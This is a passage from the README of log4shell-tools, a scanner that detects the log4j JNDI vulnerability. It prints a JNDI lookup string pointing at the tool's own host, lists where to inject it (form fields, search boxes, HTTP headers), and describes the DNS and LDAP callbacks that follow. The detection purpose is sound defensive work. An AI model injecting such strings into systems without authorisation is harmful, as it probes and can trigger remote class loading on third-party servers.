alexbakker/log4shell-tools/README.md

 <img width="750" src="https://alexbakker.me/u/iq8qmxclfb.png"/>

+## How does this work?

+The tool generates a unique ID for you to test with.
+After you click start, we'll generate a piece of text for you that looks similar to this:
+__${jndi:ldap://\*.dns.log4shell.tools:12345/\*}__.
+Copy it and paste it anywhere you suspect it might end up getting passed through log4j.
+For example: search boxes, form fields or HTTP headers.

+Once an outdated version of log4j sees this string, it will perform a DNS lookup to get the IP address of __\*.dns.log4shell.tools__.
+If this happens, it is considered the first sign of vulnerability to information leakage.
+Next, it will attempt and LDAP search request to __log4shell.tools:12345__.
+The tool responds with a Java class description, along with a URL for where to obtain it.
+Log4j may even attempt to fetch the class file.
+The tool will return a 404 and conclude the test.

 ## Installation

 The tool was tested on Go 1.16.
 Make sure it (or a more recent version) is